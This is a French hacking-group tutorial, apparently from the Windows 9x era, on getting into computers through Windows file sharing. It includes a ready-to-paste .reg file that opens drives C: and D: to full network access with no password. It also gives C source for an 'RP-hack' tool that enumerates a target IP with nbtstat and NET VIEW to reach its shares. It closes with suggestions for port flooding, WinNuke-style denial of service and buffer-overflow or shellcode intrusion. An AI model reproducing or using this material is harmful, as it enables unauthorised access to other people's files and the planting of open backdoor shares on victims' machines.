1 - Les
ressources partagées par KOP
"Pourquoi
n'avez vous pas fait un article sur le hacking par la faille
des ressources partagées de windows??!!"
Je réponds
à cette question très simplement: l'accès par les ressources partagées de
windows
n'est pas
une faille. Ceci est un système utilisé le plus souvent par les entreprises
pour
permettre au personnel de travailler depuis n'importe quel ordinateur dans
le monde en
ayant accès à ses données. Il s'agit de données partagées que,
lorsque
nous y avons accès, nous pouvons utiliser comme si elles se situaient
sur notre
propre ordinateur. En fait, lorsque vous entrez sur un ordinateur qui
possède les
ressources partagées, vous ne le hackez pas(enfin si les ressources
partagées
ont été activé exprès sinon vous le hackez vu que vous entrez sur l'ordinateur
sans
l'accord du propriétaire). Pour les personnes qui utilisent ce système pour
"hacker",
vous devez
savoir qu'il existe un moyen très simple aux administrateurs de connaitre votre
IP.
En effet,
grâce à l'observateur réseau (c:\windows\netwatch.exe), les administrateurs
peuvent
savoir se que vous faites à tout moment. Pour pouvoir utiliser cette technique
sur
quelqu'un, la personne doit avoir activé les ressources partagées.
Informations
dans la base de registre à propos des ressources partagées :
--------------------------------------------------------------------------------------------------
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{a4d92740-67cd-11cf-96f2-00aa00a11dd9}\InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}
\InfoTip
HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\InfoTip
HKEY_CLASSES_ROOT\CLSID\{a4d92740-67cd-11cf-96f2-00aa00a11dd9}\InfoTip
InfoTip: Accès aux
informations partagées sur un autre ordinateur, même si votre ordinateur
n'est
pas connecté à un réseau. L'ordinateur contacté doit être configuré comme
serveur
réseau afin que vous puissiez utiliser ses ressources partagées.
--------------------------------------------------------------------------------------------------
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetClient\0001\Ndi\HelpText
HelpText: Le client pour
les réseaux Microsoft vous permet de vous connecter
à
d'autres ordinateurs et serveurs Microsoft Windows et d'utiliser
leurs imprimantes et fichiers partagés.
--------------------------------------------------------------------------------------------------
Voici les
données qu'il faut ajouter ou modifier dans le registre pour activer les
ressources partagées:
dans
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\
créez une clé de même nom
que celui du répertoire où vous voulez accéder.
ex: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
\MES DOCUMENTS
pour l'accès à un répertoire nommé MES
DOCUMENTS.
ex:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\UPLOAD
pour l'accès au répertoire C:\PROGRAM FILES\SERVER\UPLOAD
par exemple.
Ne
mettez pas les caractères spéciaux si votre répertoire en a un.
ex:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C
pour l'accès au lecteur C:\
--------------------------------------------------------------------------------------------------
Voici les
paramètres à compléter et à ajouter dans la clé que vous venez de créer :
Flags(décimal)
------>
257
-> accès lecture seule
258
-> accès complet
259
-> accès selon mot de pass
Parm1enc->
Pass
pour l'accès complet
Parm2enc->
Pass
pour la lecture seule
Path
------->
Répertoire
et sous-répertoires partagées
ex:
"C:\" -> accès complet au lecteur C
Remark
--->
Remarque
visible par nbtstat
ex:
"Partage des ressources By HackerStorm"
Type
------> 0
Voilà, pour
partager une machine en accès complet sur les disques C:\ et D:\ facilement
vous pouvez
utiliser un fichier ".reg" en y mettant les données qui suivent :
COPIER/COLLER
-------------------------------------------------------------------------------------------
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C]
"Flags"=dword:00000102
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"="Partage
réseau fait par HackerStorm"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\D]
"Flags"=dword:00000102
"Type"=dword:00000000
"Path"="D:\\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"="Partage
réseau fait par HackerStorm"
--------------------------------------------------------------------------------------------------
Source d'un
programme pour les ressources partagées:
Voici un
petit programme qui vous évitera de faire toute la démarche obligatoire à la
connection
sur les
ressources partagées d'un ordinateur. Vous devez posséder, comme le dit les
extraits du registre,
les ressources partagées pour pouvoir
avoir accès aux servers Microsoft et pour pouvoir utiliser leurs
fichiers et
leurs imprimantes.
COPIER/COLLER
-------------------------------------------------------------------------------------------
#include
<conio.h>
#include <stdio.h>
#include
<process.h>
#define ETAPE
"-------------------------------------------------------------------------------\nETAPE
%s\n"
main(int
argc,char*argv[])
{
if(argc!=2)
{
puts("Usage:
RP-hack [IP possédant les ressources partagées]\n\
Programme
de ressources partagées par KoP pour le groupe HackerStorm.\n\
Pour
plus d'informations: HackerStorm@HotMail.com\n");
return 1;
}
printf(ETAPE,"1:\n\n----------------------\nListe\n----------------------");
char buf[80];
sprintf(buf,"nbtstat
-a %s",argv[1]);
system(buf);
puts("\n----------------------\n\n\"Failed
to access NBT Driver 1\" --> partagez vos ressources.\n\
\"Host not found\" --> non connecté ou pas de
ressources partagées … cette IP\n\n\
Appuyez
sur (2) si vous voyez <20> dans la liste.\n");
if(getch()!='2')
return 0;
printf(ETAPE,"2:\n\nTapez
le nom de l'ordinateur(devant <20>): ");
char
nom[80];
gets(nom);
FILE*
entree;entree=fopen("C:\\WIN\\LMHOSTS","wb");
fprintf(entree,"%s %s
#PRE",argv[1],nom);
fclose(entree);
system("nbtstat
-R");
printf(ETAPE,"3:\n\nVoici ce qui est partag‚ sur l'ordinateur
distant :");
sprintf(buf,"NET VIEW
\\\\%s",nom);system(buf);
printf("\n\nVous devez maintenant aller dans Démarrer ->
Rechercher -> Ordinateur\n\
et
rechercher \"%s\". Quand il l'aura trouv‚ vous aurez accès\n\
aux
données partagées de cet ordinateur.\n",nom);
return
0;
}
--------------------------------------------------------------------------------------------------
Copiez et
collez cette source dans un fichier RP-hack.cpp.
Pour
utiliser ce programme, vous devez dabord le compiler avec un compilateur C/C++
de Microsoft, Borland,... Ensuite saisissez sur la
ligne de commande:
"RP-hack"
+ l'ip de l'ordinateur qui a les ressources partagées.
Quelques
explications sur les ressources partagées:
Les
ressources partagées utilisent le protocole TCP/IP avec le transfert TCP.
L'activation
du partage nécessite l'ouverture de 3 ports, le:
- 137 : TCP Netbios name (permet le retour
de données du nbtstat et du net view)
- 138 : TCP Netbios datagram (port utilisé
pour le transfert des fichiers)
- 139 : TCP Netbios session (port utilisé
pour le transfert d'informations et de commandes)
Dans la
version 95 de windows, ces ports permettez de faire des DOS(denial of service)
attack
par l'envoi
de message out of band sur l'un de ces ports(ex: Winnuke). Ce problème a été
corrigé
dans les
nouvelles versions de windows. Lorsque les
ressources partagées sont activées,
vous pouvez
flooder le port 137 en faisant de multiples demandes de nom d'host ou le port
139
en vous
connectant et en envoyant des multitudes de commandes qui requiert beaucoup
de
temps(ex: LSTDRV) en très peu de temps. Vous avez aussi la possibilité
d'utiliser le
buffer
overflow ou mieux des shell code pour avoir accès à l'ordinateur sans avoir
besoin du pass.
By KoP